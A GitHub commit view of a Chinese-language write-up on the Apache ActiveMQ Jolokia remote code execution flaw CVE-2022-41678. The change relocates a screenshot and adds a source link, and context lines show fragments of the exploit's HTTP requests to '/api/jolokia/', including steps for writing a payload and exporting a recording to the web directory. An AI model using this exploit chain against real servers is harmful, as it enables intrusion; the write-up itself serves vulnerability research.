Update Apache-ActiveMQ-Jolokia-远程代码执行漏洞-CVE-2022-41678.md

This commit is contained in:
wy876 2023-11-30 23:46:26 +08:00 committed by GitHub
parent f1643e7a9b
commit 3e91d39ee0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -35,7 +35,7 @@ Content-Length: 136
记住这个 `value`参数中的值后面的poc要用到,例如现在是4
![](./assets/20231130233131.png)
#### 写入payload
![](./assets/20231130233450.png)
```
POST /api/jolokia/ HTTP/1.1
Host: localhost:8161
@ -714,7 +714,7 @@ Content-Length: 136
</configuration>"]
}
```
![](./assets/20231130233450.png)
### 导出录制到web目录
```
POST /api/jolokia/ HTTP/1.1
@ -777,3 +777,10 @@ Content-Length: 159
![](./assets/20231130233835.png)
## 漏洞来源
- https://l3yx.github.io/2023/11/29/Apache-ActiveMQ-Jolokia-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-CVE-2022-41678-%E5%88%86%E6%9E%90/
## payload
本地搭建源码环境配置不正确无法调试代码payload是搜索GitHub关键字找到的
- https://github.com/gradle/gradle-profiler/blob/2eb14e031fbd48203fb05b28183decd1ee2304de/src/main/resources/org/gradle/profiler/jfr/openjdk.jfc#L4